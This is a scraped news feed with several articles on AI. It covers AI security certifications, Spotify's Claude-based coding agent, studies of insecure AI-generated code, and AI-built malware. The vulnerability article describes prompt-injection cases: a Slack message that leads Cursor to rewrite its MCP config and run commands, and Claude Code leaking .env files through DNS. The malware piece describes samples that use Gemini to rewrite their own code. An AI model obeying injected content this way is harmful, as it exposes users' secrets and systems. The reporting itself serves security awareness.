AI Governance &amp; Ethics (CRAGE)</strong> - <em>Govern</em> Enterprise-scale AI governance with NIST and ISO compliance frameworks. Covers accountability structures, oversight mechanisms, and risk management from deployment through operations.</p> <h3 id="cciso-v4">CCISO v4</h3> <p>Alongside the AI credentials, EC-Council updated its Certified CISO program to version 4, adding AI-driven risk management to the executive leadership curriculum. The update reflects a reality that most CISOs are now navigating: AI systems that &quot;learn, adapt, and influence outcomes at speed&quot; require fundamentally different governance than traditional IT infrastructure.</p> <blockquote> <p>&quot;AI is moving from experimentation to infrastructure, and the workforce has to move with it,&quot; said Jay Bavisi, Group President of EC-Council.</p></blockquote> <h2 id="the-workforce-gap">The Workforce Gap</h2> <p>IDC estimates <strong>$5.5 trillion</strong> in global AI risk exposure. Bain &amp; Company projects <strong>700,000 U.S. workers</strong> need AI and cybersecurity reskilling. The talent concentration problem makes this worse: 67% of AI workforce talent is concentrated in just 15 U.S. cities, and only 28% of the AI workforce are women.</p> <p>The policy environment is pushing in the same direction. Executive Order 14179, the July 2025 AI Action Plan with its workforce development pillar, and Executive Orders 14277 and 14278 all expanded AI education pathways. The government recognizes the gap. Whether certifications can close it is another question.</p> <h2 id="the-skeptics-view">The Skeptic's View</h2> <p>EC-Council holds ISO/IEC 17024 accreditation, DoD 8140 baseline recognition, and claims 350,000+ professionals certified globally. Its Certified Ethical Hacker (CEH) credential is one of the most recognized in cybersecurity. The credibility is real.</p> <p>But certification programs have a structural limitation: they validate knowledge at a point in time. AI security is evolving faster than any certification body can update curricula. The COASP credential covering LLM exploitation techniques will face the same challenge every AI security program faces - the attack surface shifts monthly.</p> <p>The more practical concern is whether the market actually values these credentials. Hiring managers in <a href="/reviews/ai-cybersecurity-ranges-platforms-2026/">AI security roles</a> currently prioritize hands-on experience with specific tools and frameworks over certifications. EC-Council is betting that as AI governance becomes a regulatory requirement - not just a best practice - formal credentials will become non-negotiable for compliance.</p> <h3 id="who-benefits">Who Benefits</h3> <ul> <li><strong>Security professionals</strong> looking to formalize AI security skills they are already developing informally</li> <li><strong>Program managers</strong> who need to demonstrate AI governance competency to auditors and regulators</li> <li><strong>CISOs</strong> who need structured frameworks for AI risk management at the executive level</li> <li><strong>EC-Council</strong>, which gains first-mover advantage in a certification category that every competitor will eventually enter</li> </ul> <h3 id="who-pays">Who Pays</h3> <ul> <li><strong>Organizations</strong> that treat certifications as substitutes for actual security investment</li> <li><strong>Professionals</strong> who over-index on credentials over practical skills in a field where the tools change quarterly</li> <li><strong>The industry</strong> if certifications create a false sense of preparedness against threats that 74% of practitioners cannot currently detect</li> </ul> <hr> <p>The 890% traffic surge and 87% attack rate are not going to slow down. EC-Council's bet is that formal AI security education, structured around adopt-defend-govern, can narrow the gap between AI adoption speed and security readiness. The bet is reasonable. Whether four certifications can meaningfully shift outcomes against a $5.5 trillion risk surface is the harder question - and one that will only be answered by the incident reports of 2027.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://thehackernews.com/2026/02/ec-council-expands-ai-certification.html">EC-Council Expands AI Certification Portfolio - The Hacker News</a></li> <li><a href="https://www.globenewswire.com/news-release/2026/02/10/3235672/0/en/EC-Council-Expands-AI-Certification-Portfolio-to-Strengthen-U-S-AI-Workforce-Readiness-and-Security.html">EC-Council Expands AI Certification Portfolio - GlobeNewswire</a></li> <li><a href="https://www.paloaltonetworks.com/blog/2025/06/genais-impact-surging-adoption-rising-risks/">GenAI's Impact: Surging Adoption and Rising Risks - Palo Alto Networks</a></li> <li><a href="https://kbi.media/press-release/palo-alto-networks-state-of-generative-ai-report-finds-890-surge-in-generative-ai-traffic-raising-new-security-challenges-for-asia-pacific-and-japan-enterprises/">Palo Alto Networks State of Generative AI Report: 890% Surge - KBI Media</a></li> <li><a href="https://sosafe-awareness.com/company/press/global-businesses-face-escalating-ai-risk-as-87-hit-by-ai-cyberattacks/">87% of Organizations Hit by AI Cyberattacks - SoSafe</a></li> <li><a href="https://reports.weforum.org/docs/WEF_Global_Cybersecurity_Outlook_2026.pdf">Global Cybersecurity Outlook 2026 - World Economic Forum</a></li> <li><a href="https://www.infosecurity-magazine.com/news/majority-of-orgs-hit-by-ai/">Majority of Orgs Hit by AI Cyber-Attacks - Infosecurity Magazine</a></li> </ul>Daniel OkaforNewsSpotify's Best Engineers Haven't Written a Line of Code Since Decemberhttps://awesomeagents.ai/news/spotify-best-developers-stopped-writing-code/Sat, 21 Feb 2026 13:59:00 +0100https://awesomeagents.ai/news/spotify-best-developers-stopped-writing-code/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Spotify co-CEO Gustav Soderström said the company's best developers &quot;haven't written a single line of code since December&quot; during Q4 2025 earnings</li> <li>Engineers use an internal system called Honk, built on Anthropic's Claude, to generate and ship code from Slack on their phones</li> <li>Spotify's R&amp;D expenses fell 23% year-over-year to EUR 290 million while shipping 50+ features</li> <li>The developer community is deeply divided: 14,000+ upvotes on Reddit, overwhelmingly skeptical</li> </ul> </div> <p>During Spotify's Q4 2025 earnings call on February 10, co-CEO Gustav Soderström made a statement that set the developer internet on fire:</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Spotify co-CEO Gustav Soderström said the company's best developers &quot;haven't written a single line of code since December&quot; during Q4 2025 earnings</li> <li>Engineers use an internal system called Honk, built on Anthropic's Claude, to generate and ship code from Slack on their phones</li> <li>Spotify's R&amp;D expenses fell 23% year-over-year to EUR 290 million while shipping 50+ features</li> <li>The developer community is deeply divided: 14,000+ upvotes on Reddit, overwhelmingly skeptical</li> </ul> </div> <p>During Spotify's Q4 2025 earnings call on February 10, co-CEO Gustav Soderström made a statement that set the developer internet on fire:</p> <blockquote> <p>&quot;When I speak to my most senior engineers - the best developers we have - they actually say that they haven't written a single line of code since December. They actually only generate code and supervise it.&quot;</p></blockquote> <p>The claim went viral within hours. The TechCrunch article drew thousands of comments across Reddit, Hacker News, and Slashdot. Developers are divided between those who see the future arriving on schedule and those who see corporate delusion dressed up as innovation.</p> <h2 id="what-actually-changed">What Actually Changed</h2> <p>Soderström described Christmas 2025 as a &quot;singular event&quot; in AI productivity, when Anthropic's Claude Opus 4.5 became available. He used uncharacteristically romantic language for an earnings call: developer-AI relationships had &quot;crossed the threshold&quot; and &quot;things just started working.&quot;</p> <p>The commute scenario he described sounds like science fiction:</p> <blockquote> <p>&quot;An engineer at Spotify on their morning commute from Slack on their cell phone can tell Claude to fix a bug or add a new feature to the iOS app. And once Claude finishes that work, the engineer then gets a new version of the app, pushed to them on Slack on their phone, so that he can then merge it to production, all before they even arrive at the office.&quot;</p></blockquote> <p>But behind the headline is a seven-year infrastructure story that most coverage has ignored.</p> <h2 id="inside-honk-spotifys-coding-agent">Inside Honk: Spotify's Coding Agent</h2> <p>The system making this possible is called <strong>Honk</strong>, and it did not appear overnight. It sits atop three layers of infrastructure Spotify has been building since 2020:</p> <table> <thead> <tr> <th>Layer</th> <th>Year</th> <th>Function</th> </tr> </thead> <tbody> <tr> <td>Backstage</td> <td>2020</td> <td>Open-source developer portal cataloging all components and ownership</td> </tr> <tr> <td>Fleet Management</td> <td>2022</td> <td>Framework for fleet-wide code transformations across hundreds of repos</td> </tr> <tr> <td>Claude Integration</td> <td>July 2025</td> <td>Claude Agent SDK plugged into Fleet Management via MCP</td> </tr> </tbody> </table> <p>Spotify's engineering team published a detailed three-part blog series (November-December 2025) explaining how Honk works. The architecture is more careful than &quot;just ask Claude to write code&quot;:</p> <ul> <li>The agent runs in <strong>sandboxed containers</strong> with restricted permissions, few binaries, and virtually no access to surrounding systems</li> <li>An <strong>LLM-as-judge</strong> layer evaluates every proposed diff against the original prompt, vetoing approximately 25% of changes</li> <li>When vetoed, agents successfully course-correct about 50% of the time</li> <li>Sessions are capped at <strong>10 turns with 3 retries</strong></li> <li>Each prompt targets <strong>one change only</strong> - combined changes exhaust context windows</li> </ul> <h3 id="what-it-handles">What It Handles</h3> <p>Honk is not writing greenfield features from scratch. The task types are specific and well-scoped:</p> <ul> <li>Language modernization (Java records conversion)</li> <li>Dependency upgrades with breaking changes</li> <li>UI component migrations</li> <li>YAML/JSON configuration updates</li> <li>Architecture decision record generation</li> </ul> <p>Chief Architect Niklas Gustavsson confirmed Claude as their &quot;model of choice,&quot; noting that Spotify adopted Sonnet 4.5 as their default because it &quot;currently leads on the metrics that matter for fleet-wide engineering at scale.&quot;</p> <h2 id="the-numbers">The Numbers</h2> <table> <thead> <tr> <th>Metric</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>PRs merged from Honk</td> <td>1,500+ (as of Nov 2025)</td> </tr> <tr> <td>Monthly agent-generated PRs</td> <td>650+</td> </tr> <tr> <td>Time savings per migration</td> <td>60-90%</td> </tr> <tr> <td>Features shipped in 2025</td> <td>50+</td> </tr> <tr> <td>Staff opted into Claude Code</td> <td>~66%</td> </tr> <tr> <td>R&amp;D expenses Q4 2025</td> <td>EUR 290M (down 23% YoY)</td> </tr> <tr> <td>Full-year R&amp;D</td> <td>EUR 1.39B (down 6%)</td> </tr> </tbody> </table> <p>Those R&amp;D savings land differently when you remember the context. Spotify has cut roughly 27% of its workforce since 2023 - approximately 2,300 jobs across three rounds of layoffs. Peak headcount was around 9,800; current staffing sits near 7,000.</p> <p>The financial results are strong. Q4 revenue hit EUR 4.53 billion (up 13% constant currency), operating income rose 47% to EUR 701 million, and net income tripled year-over-year to EUR 1.17 billion. The stock jumped 14.75% on earnings day.</p> <h2 id="the-developer-backlash">The Developer Backlash</h2> <p>The Reddit thread in r/technology drew 14,275 upvotes and 2,377 comments within 48 hours. The sentiment was overwhelmingly skeptical.</p> <p>The most common criticism is the &quot;whack-a-mole&quot; problem - AI fixes one bug but introduces two more because it lacks holistic codebase understanding. Developers on Hacker News questioned how &quot;best&quot; was being measured: one commenter reframed it sarcastically - &quot;developers who stopped coding are 'the best,' implying those still coding are less efficient.&quot;</p> <p>The commute example drew particular fire. Multiple commenters flagged it as normalizing uncompensated labor. One Slashdot user called it &quot;dystopian&quot; - arguing it suggests forced office presence despite remote capability combined with an expectation to work during transit.</p> <blockquote> <p>&quot;Please don't work during your morning commute,&quot; one highly-upvoted comment read.</p></blockquote> <p>Others questioned how experienced engineers could approve code pushed via Slack on a phone without proper review. &quot;This is the equivalent of a manager claiming zero bugs - met with laughter,&quot; wrote one Slashdot contributor.</p> <h3 id="the-research-backing-the-skeptics">The Research Backing the Skeptics</h3> <p>The skepticism has empirical support:</p> <ul> <li>Developers using <a href="/tools/best-ai-coding-assistants-2026/">AI coding tools</a> scored <strong>17% lower</strong> on coding comprehension tests despite completing tasks faster (January 2026 study)</li> <li><strong>45% of AI-generated code</strong> contains security vulnerabilities in the OWASP Top 10 (Veracode report)</li> <li>Code churn increased <strong>39%</strong> in AI-heavy codebases (GitClear)</li> <li>A report titled &quot;4x Velocity, 10x Vulnerabilities&quot; from Apiiro quantified the tradeoff</li> </ul> <p>Microsoft, which estimates 20-30% of its code is now AI-generated, appointed former EVP of Security Charlie Bell as a &quot;quality czar&quot; in February 2026 to address growing concerns.</p> <h2 id="the-nuanced-take">The Nuanced Take</h2> <p>The most insightful analyses pointed out what Soderström's headline obscures: &quot;not writing code&quot; does not mean &quot;not working.&quot; The role has shifted from typing syntax to specifying requirements clearly enough that AI can implement them correctly, then validating the output.</p> <p>And Spotify's infrastructure - not the AI model - is the actual competitive advantage. The seven years spent building Backstage, Fleet Management, and comprehensive testing pipelines is what makes AI-generated code safe to ship. Most companies lack this foundation.</p> <p>As one analysis put it: &quot;When execution becomes cheap, strategy becomes the bottleneck.&quot;</p> <h3 id="the-product-quality-question">The Product Quality Question</h3> <p>Critics point to Spotify's track record:</p> <ul> <li><strong>Car Thing</strong> (2022): hardware product bricked via firmware update, cost $31.4 million, triggered a class action</li> <li><strong>HiFi audio</strong>: announced in 2021, still unshipped five years later</li> <li>Two major outages in 2025</li> <li>Android app freezing and podcast crashes reported in late 2025</li> <li><strong>2024 Wrapped</strong>: backlash for AI-generated podcast content dismissed as &quot;cringey&quot; and &quot;soulless&quot;</li> </ul> <p>If AI-generated code is so productive, the argument goes, why hasn't product quality improved proportionally?</p> <h2 id="what-the-market-is-missing">What the Market Is Missing</h2> <p>The real story is not whether Spotify's developers write code. It is the economics. Spotify reduced R&amp;D spending by 23% year-over-year while shipping more features and growing revenue 13%. If that ratio holds - and if other companies can replicate it - the implications for <a href="/guides/getting-started-with-ai-coding-assistants/">developer employment</a> are significant.</p> <p>Soderström was explicit about the stakes:</p> <blockquote> <p>&quot;There is going to have to be a lot of change in these tech companies if you want to stay competitive, and we are absolutely hell-bent on leading that change.&quot;</p></blockquote> <p>Spotify is not the only company moving this direction. Klarna deployed an AI customer service agent handling 65% of inquiries without human intervention. Duolingo replaced contract workers with AI. Stripe's AI Minions now ship <a href="/news/stripe-minions-coding-agents-1300-prs/">1,300 PRs per week</a>. The pattern is consistent: automate, reduce headcount, maintain or increase output.</p> <p>Whether this is progress or a race to the bottom depends on where you sit. But the numbers do not lie: two-thirds of Spotify's staff opted into Claude Code voluntarily. Whatever the internet thinks, the people inside the building are voting with their workflows.</p> <hr> <p><strong>Sources:</strong></p> <ul> <li><a href="https://techcrunch.com/2026/02/12/spotify-says-its-best-developers-havent-written-a-line-of-code-since-december-thanks-to-ai/">Spotify says its best developers haven't written a line of code since December - TechCrunch</a></li> <li><a href="https://www.techspot.com/news/111318-spotify-top-engineers-havent-written-code-months-ai.html">Spotify says its top engineers haven't written code in months - TechSpot</a></li> <li><a href="https://developers.slashdot.org/story/26/02/13/1834228/spotify-says-its-best-developers-havent-written-a-line-of-code-since-december-thanks-to-ai">Spotify's Best Developers Haven't Written Code Since Dec - Slashdot</a></li> <li><a href="https://www.androidauthority.com/spotify-ai-coding-app-3640653/">Frustrated with Spotify updates? Take a guess who's to blame - Android Authority</a></li> <li><a href="https://www.hrgrapevine.com/content/article/2026-02-17-spotify-says-ai-means-its-top-software-engineers-no-longer-write-code">Spotify AI says its top software engineers no longer write code - HR Grapevine</a></li> </ul>Daniel OkaforNewsVibe Coding Is a Security Catastrophe: 69 Vulnerabilities Found Across 5 Major AI Coding Toolshttps://awesomeagents.ai/news/vibe-coding-security-69-vulnerabilities/Sat, 21 Feb 2026 13:58:00 +0100https://awesomeagents.ai/news/vibe-coding-security-69-vulnerabilities/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Security firm Tenzai tested 5 AI coding tools by building 3 identical apps each - found <strong>69 vulnerabilities</strong> across all 15 apps</li> <li>Every single tool introduced <strong>Server-Side Request Forgery (SSRF)</strong> vulnerabilities. Zero apps implemented CSRF protection. Zero apps set security headers</li> <li>Carnegie Mellon found that 61% of AI-generated code is functionally correct but <strong>only 10.5% is secure</strong></li> <li>Escape.tech discovered <strong>2,000+ vulnerabilities</strong> and <strong>400+ exposed secrets</strong> in 5,600 publicly deployed vibe-coded applications</li> </ul> </div> <p>The numbers are in, and they are worse than the pessimists predicted. A December 2025 study by security startup Tenzai systematically tested five of the most popular AI coding tools - Claude Code, OpenAI Codex, Cursor, Replit, and Devin - by having each build three identical web applications from pre-defined prompts. The result: 69 vulnerabilities across 15 applications, with patterns so consistent they suggest the problem is structural, not incidental.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Security firm Tenzai tested 5 AI coding tools by building 3 identical apps each - found <strong>69 vulnerabilities</strong> across all 15 apps</li> <li>Every single tool introduced <strong>Server-Side Request Forgery (SSRF)</strong> vulnerabilities. Zero apps implemented CSRF protection. Zero apps set security headers</li> <li>Carnegie Mellon found that 61% of AI-generated code is functionally correct but <strong>only 10.5% is secure</strong></li> <li>Escape.tech discovered <strong>2,000+ vulnerabilities</strong> and <strong>400+ exposed secrets</strong> in 5,600 publicly deployed vibe-coded applications</li> </ul> </div> <p>The numbers are in, and they are worse than the pessimists predicted. A December 2025 study by security startup Tenzai systematically tested five of the most popular AI coding tools - Claude Code, OpenAI Codex, Cursor, Replit, and Devin - by having each build three identical web applications from pre-defined prompts. The result: 69 vulnerabilities across 15 applications, with patterns so consistent they suggest the problem is structural, not incidental.</p> <h2 id="the-tenzai-audit">The Tenzai Audit</h2> <p>Researcher Ori David designed the test to isolate each tool's security baseline. Same applications, same prompts, different agents. The breakdown:</p> <table> <thead> <tr> <th>Agent</th> <th>Total Vulnerabilities</th> <th>Critical</th> </tr> </thead> <tbody> <tr> <td>Claude Code</td> <td>16</td> <td>4</td> </tr> <tr> <td>OpenAI Codex</td> <td>13</td> <td>1</td> </tr> <tr> <td>Cursor</td> <td>13</td> <td>0</td> </tr> <tr> <td>Replit</td> <td>13</td> <td>0</td> </tr> <tr> <td>Devin</td> <td>14</td> <td>1</td> </tr> </tbody> </table> <h3 id="what-they-got-right">What They Got Right</h3> <p>Credit where it is due: none of the tools produced exploitable SQL injection or cross-site scripting in the traditional sense. They consistently used parameterized queries and relied on framework-level sanitization. The &quot;solved&quot; vulnerability classes - the ones with generic, pattern-based defenses - are genuinely handled well.</p> <h3 id="what-they-got-catastrophically-wrong">What They Got Catastrophically Wrong</h3> <p>The failures clustered in three areas that share a common trait: they require contextual understanding that AI does not have.</p> <p><strong>Authorization logic.</strong> The most common failure. Codex skipped validation for non-shopper roles entirely. <a href="/reviews/review-claude-code-cli/">Claude Code</a> generated code that checked authentication but skipped all permission validation when users were not logged in, enabling unrestricted product deletion.</p> <p><strong>Business logic.</strong> Four of five agents allowed negative order quantities. Three allowed negative product prices. These are not obscure edge cases - they are the first thing a human QA tester checks.</p> <p><strong>Server-Side Request Forgery.</strong> All five agents introduced SSRF in a URL preview feature, allowing attackers to invoke requests to arbitrary internal URLs, access internal services, bypass firewalls, and leak credentials. Five out of five. One hundred percent.</p> <h3 id="the-missing-basics">The Missing Basics</h3> <p>The &quot;ugly&quot; category is arguably worse than the vulnerabilities themselves:</p> <ul> <li><strong>CSRF protection</strong>: 0 of 15 apps implemented it (2 attempted, both failed)</li> <li><strong>Security headers</strong>: 0 of 15 apps set CSP, X-Frame-Options, HSTS, X-Content-Type-Options, or proper CORS</li> <li><strong>Rate limiting</strong>: 1 of 15 apps attempted it - and the implementation was bypassable via the X-Forwarded-For header</li> </ul> <blockquote> <p>&quot;Coding agents cannot be trusted to design secure applications,&quot; Tenzai concluded. &quot;They seem to be very prone to business logic vulnerabilities. While human developers bring intuitive understanding that helps them grasp how workflows should operate, agents lack this 'common sense.'&quot;</p></blockquote> <p>The researchers also tested whether security-focused prompts could fix the problem. They added explicit vulnerability warnings and risk identification instructions. The result: &quot;minimal vulnerability reduction.&quot;</p> <h2 id="the-broader-data">The Broader Data</h2> <p>Tenzai's study is not an outlier. Multiple independent assessments have converged on the same conclusion.</p> <h3 id="carnegie-mellon-61-correct-105-secure">Carnegie Mellon: 61% Correct, 10.5% Secure</h3> <p>The SusVibes benchmark from Carnegie Mellon tested SWE-Agent with Claude 4 Sonnet on 200 real-world feature-request tasks. The finding: <strong>61% of solutions were functionally correct, but only 10.5% were secure.</strong> Even augmenting prompts with explicit vulnerability hints could not close that gap.</p> <h3 id="veracode-45-vulnerability-rate">Veracode: 45% Vulnerability Rate</h3> <p>The 2025 GenAI Code Security Report tested 80 coding tasks across 100+ LLMs in four languages. AI introduced OWASP Top 10 vulnerabilities in 45% of cases. Java had it worst at over 70%. CWE-80 (cross-site scripting) showed failure rates of 86%, with no improvement even in the latest models including GPT-5.</p> <h3 id="coderabbit-ai-code-introduces-17x-more-issues">CodeRabbit: AI Code Introduces 1.7x More Issues</h3> <p>Analysis of 470 GitHub PRs (320 AI-co-authored, 150 human-only) found AI-generated code produces:</p> <ul> <li><strong>2.74x</strong> more XSS vulnerabilities</li> <li><strong>1.91x</strong> more insecure object references</li> <li><strong>1.88x</strong> more improper password handling</li> <li><strong>8x</strong> more excessive I/O operations</li> <li><strong>3x</strong> more readability problems</li> </ul> <h3 id="escapetech-2000-vulns-in-the-wild">Escape.tech: 2,000+ Vulns in the Wild</h3> <p>The most alarming data comes from Escape.tech, which scanned 5,600 publicly available applications built on vibe coding platforms (Lovable, Base44, Create.xyz, Vibe Studio, Bolt.new). They found:</p> <ul> <li><strong>2,000+ vulnerabilities</strong></li> <li><strong>400+ exposed secrets</strong> (API keys, tokens)</li> <li><strong>175 instances of PII exposure</strong> including medical records, IBANs, and phone numbers</li> <li>Exposed authentication tokens in JavaScript bundles</li> <li>Misconfigured Row-Level Security policies in Supabase</li> </ul> <p>The researchers described their results as &quot;lower-bound estimates&quot; because they used intentionally conservative passive scanning.</p> <h2 id="the-ai-ide-vulnerability-crisis">The AI IDE Vulnerability Crisis</h2> <p>The tools themselves are not just generating insecure code - they are insecure. Security researcher Ari Marzouk disclosed <strong>30+ vulnerabilities across 24 CVEs</strong> in the AI coding tools developers use daily:</p> <table> <thead> <tr> <th>CVE</th> <th>Tool</th> <th>Severity</th> <th>Issue</th> </tr> </thead> <tbody> <tr> <td>CVE-2025-54135</td> <td>Cursor</td> <td>8.6</td> <td>Auto-executes MCP config changes even when user rejects suggestion</td> </tr> <tr> <td>CVE-2025-55284</td> <td>Claude Code</td> <td>High</td> <td>DNS exfiltration via prompt injection reads .env files</td> </tr> <tr> <td>SpAIware</td> <td>Windsurf</td> <td>High</td> <td>Memory-persistent data exfiltration survives across sessions</td> </tr> <tr> <td>IDEsaster</td> <td>12 tools</td> <td>Multiple</td> <td>JSON schema exfiltration, config-based RCE, workspace overrides</td> </tr> </tbody> </table> <p>The Cursor vulnerability (CurXecute) is particularly striking: when the agent suggests an edit to <code>~/.cursor/mcp.json</code>, the edit lands on disk and triggers command execution <strong>even if the user rejects the suggestion in the UI</strong>. A malicious Slack message, when summarized by Cursor's AI, was demonstrated to rewrite MCP config files and execute arbitrary commands with developer privileges within minutes.</p> <h2 id="what-it-does-not-tell-you">What It Does Not Tell You</h2> <p>These studies test default behavior - what happens when a developer prompts an AI tool without explicitly requesting secure code. Databricks' AI Red Team found that self-reflection prompts can improve security by 60-80% for Claude and up to 50% for GPT-4o. The tools can find their own vulnerabilities when asked.</p> <p>But that is precisely the problem <a href="/guides/what-is-vibe-coding/">vibe coding</a> was supposed to solve. The entire premise is that developers - or non-developers - can describe what they want and get working software. Requiring them to also know which security prompts to add defeats the purpose.</p> <p>As Palo Alto Networks Unit 42 put it: &quot;AI agents are optimized to provide a working answer, fast. They are not inherently optimized to ask critical security questions.&quot;</p> <hr> <p>The data is unambiguous. AI coding tools produce functionally correct software at unprecedented speed. They also produce software riddled with authorization flaws, missing security controls, and business logic errors that no human developer would ship. The 69 vulnerabilities in Tenzai's study are not bugs to be fixed in the next model release. They are a structural consequence of tools that optimize for &quot;does it work?&quot; while ignoring &quot;is it safe?&quot; Until the incentive structure changes - or security becomes a native part of the generation pipeline rather than an afterthought - every <a href="/guides/what-is-vibe-coding/">vibe-coded application</a> is a penetration tester's dream.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://www.csoonline.com/article/4116923/output-from-vibe-coding-tools-prone-to-critical-security-flaws-study-finds.html">Output from vibe coding tools prone to critical security flaws, study finds - CSO Online</a></li> <li><a href="https://www.databricks.com/blog/passing-security-vibe-check-dangers-vibe-coding">Passing the Security Vibe Check: The Dangers of Vibe Coding - Databricks</a></li> <li><a href="https://unit42.paloaltonetworks.com/securing-vibe-coding-tools/">Securing Vibe Coding Tools: Scaling Productivity Without Scaling Risk - Unit 42</a></li> <li><a href="https://thenewstack.io/vibe-coding-could-cause-catastrophic-explosions-in-2026/">Vibe coding could cause catastrophic 'explosions' in 2026 - The New Stack</a></li> <li><a href="https://arxiv.org/abs/2512.03262">Is Vibe Coding Safe? - arXiv (Carnegie Mellon)</a></li> <li><a href="https://www.veracode.com/resources/gen-ai-code-security-report">Veracode 2025 GenAI Code Security Report</a></li> <li><a href="https://www.kaspersky.com/blog/vibe-coding-2025-risks/54584/">Security risks of vibe coding and LLM assistants - Kaspersky</a></li> </ul>Elena MarchettiNewsCriminals Are Vibe-Coding Malware Now. The First Samples Are Worse Than You Think.https://awesomeagents.ai/news/criminals-vibe-coding-malware-ai/Sat, 21 Feb 2026 13:57:00 +0100https://awesomeagents.ai/news/criminals-vibe-coding-malware-ai/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li><strong>VoidLink</strong>: an 88,000-line Linux malware framework built by a single person in under a week using AI coding agent TRAE SOLO - the first documented case of a full malware platform authored almost entirely by AI</li> <li><strong>Sicarii ransomware</strong>: vibe-coded RaaS that accidentally discards its own decryption keys, making recovery impossible for both victim and attacker</li> <li><strong>PROMPTFLUX and PROMPTSTEAL</strong>: malware samples with LLM API calls embedded directly in the source code, querying Gemini and Hugging Face models at runtime</li> <li>Dark web AI tools (GhostGPT, WormGPT, FraudGPT) are selling for $50-$200/month, requiring zero technical expertise</li> </ul> </div> <p>The question is no longer whether criminals are using AI to write malware. The question is how fast the ecosystem is maturing. The answer, based on samples catalogued by Check Point, Google, Halcyon, ESET, Darktrace, and Palo Alto Networks over the past six months, is: faster than the security industry expected.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li><strong>VoidLink</strong>: an 88,000-line Linux malware framework built by a single person in under a week using AI coding agent TRAE SOLO - the first documented case of a full malware platform authored almost entirely by AI</li> <li><strong>Sicarii ransomware</strong>: vibe-coded RaaS that accidentally discards its own decryption keys, making recovery impossible for both victim and attacker</li> <li><strong>PROMPTFLUX and PROMPTSTEAL</strong>: malware samples with LLM API calls embedded directly in the source code, querying Gemini and Hugging Face models at runtime</li> <li>Dark web AI tools (GhostGPT, WormGPT, FraudGPT) are selling for $50-$200/month, requiring zero technical expertise</li> </ul> </div> <p>The question is no longer whether criminals are using AI to write malware. The question is how fast the ecosystem is maturing. The answer, based on samples catalogued by Check Point, Google, Halcyon, ESET, Darktrace, and Palo Alto Networks over the past six months, is: faster than the security industry expected.</p> <blockquote> <p>&quot;Everybody's asking: Is vibe coding used in malware? And the answer, right now, is very likely yes,&quot; said Kate Middagh, Senior Consulting Director at Palo Alto Networks Unit 42.</p></blockquote> <p>She is being diplomatic. The evidence is no longer circumstantial.</p> <h2 id="voidlink-88000-lines-in-one-week">VoidLink: 88,000 Lines in One Week</h2> <p>The most significant specimen is VoidLink, a sophisticated Linux malware framework discovered by Check Point Research in late 2025. Written in Zig with an arsenal in C and a backend in Go, VoidLink is designed for long-term stealthy access to cloud environments and includes eBPF and LKM rootkits, cloud enumeration modules, and a modular C2 infrastructure.</p> <p>What makes VoidLink unique is not what it does but how it was built. The developer used <strong>TRAE SOLO</strong>, an AI coding agent embedded in the TRAE IDE, and left the receipts: Chinese-language instruction documents, sprint plans, design specifications, and development timelines - all generated by the AI tool and preserved in the codebase.</p> <blockquote> <p>&quot;VoidLink stands as the first evidently documented case...authored almost entirely by artificial intelligence, likely under the direction of a single individual,&quot; Check Point concluded.</p></blockquote> <p>The documentation structure initially suggested a multi-team organization. It was one person. The AI enabled them to plan, develop, and iterate a complex malware platform in days - &quot;something that previously required coordinated teams and significant resources.&quot;</p> <p>Check Point's parting question: &quot;How many other sophisticated malware frameworks out there were built using AI, but left no artifacts to tell?&quot;</p> <h2 id="the-malware-that-cannot-decrypt-itself">The Malware That Cannot Decrypt Itself</h2> <p>If VoidLink represents what happens when a competent operator uses AI, <strong>Sicarii ransomware</strong> shows what happens when an incompetent one does.</p> <p>Sicarii emerged in December 2025 as a ransomware-as-a-service operation. It uses AES-GCM encryption with 256-bit keys, exploits CVE-2025-64446 in Fortinet devices, and includes geo-fencing that refuses execution on Israeli systems. On paper, it looks professional.</p> <p>In practice, it has a catastrophic bug: it generates a new RSA key pair on the victim system during each execution and <strong>immediately discards the private key</strong> once encryption completes. Neither the victim nor the attacker can decrypt the files.</p> <blockquote> <p>&quot;Halcyon assesses with moderate confidence that the developers may have used AI-assisted tooling, which could have contributed to this implementation error.&quot;</p></blockquote> <p>The telltale signs: the code contains excessive inline documentation, hardcoded values that should have been parameterized, and implementation patterns consistent with AI generation. Halcyon's key material capture technology was able to intercept encryption keys before the buggy routine completed, enabling recovery without ransom payment. Sicarii subsequently released updated versions fixing the bug - presumably after running the code through another AI session.</p> <h2 id="malware-that-calls-the-ai-during-execution">Malware That Calls the AI During Execution</h2> <p>The most technically novel specimens embed LLM API calls directly in the malware, querying AI models at runtime:</p> <h3 id="promptflux">PROMPTFLUX</h3> <p>Discovered by Google's Threat Intelligence Group in June 2025, PROMPTFLUX is a VBScript dropper that queries the <strong>Gemini API</strong> to rewrite its own source code. One variant instructs the API to act as an &quot;expert VBScript obfuscator&quot; and regenerates itself on an hourly basis, creating &quot;just-in-time&quot; polymorphism that evades static signature detection.</p> <h3 id="promptsteal">PROMPTSTEAL</h3> <p>Linked to Russia's APT28 (FROZENLAKE), PROMPTSTEAL masquerades as an image generation program. While guiding users through image prompts, it queries the <strong>Hugging Face API</strong> (Qwen2.5-Coder-32B-Instruct) in the background to generate reconnaissance commands, then blindly executes the LLM's output locally before exfiltrating collected data. It represents the first observed state-sponsored malware querying an LLM in live operations.</p> <h3 id="promptspy">PromptSpy</h3> <p>Discovered by ESET in early 2026, PromptSpy is the first known Android malware to use generative AI in its execution flow. It sends <strong>Google Gemini</strong> a natural language prompt along with an XML dump of the current screen; Gemini responds with JSON instructions telling the malware what action to perform. This makes it adaptive to virtually any device, screen size, or UI layout.</p> <h2 id="the-ai-malware-marketplace">The AI Malware Marketplace</h2> <p>The dark web ecosystem for AI-powered offense has matured rapidly:</p> <table> <thead> <tr> <th>Tool</th> <th>Price</th> <th>Distribution</th> <th>Capabilities</th> </tr> </thead> <tbody> <tr> <td>GhostGPT</td> <td>$50/week - $300/3 months</td> <td>Telegram</td> <td>Malware creation, BEC scams, phishing</td> </tr> <tr> <td>FraudGPT</td> <td>$200/month - $1,700/year</td> <td>Dark web markets</td> 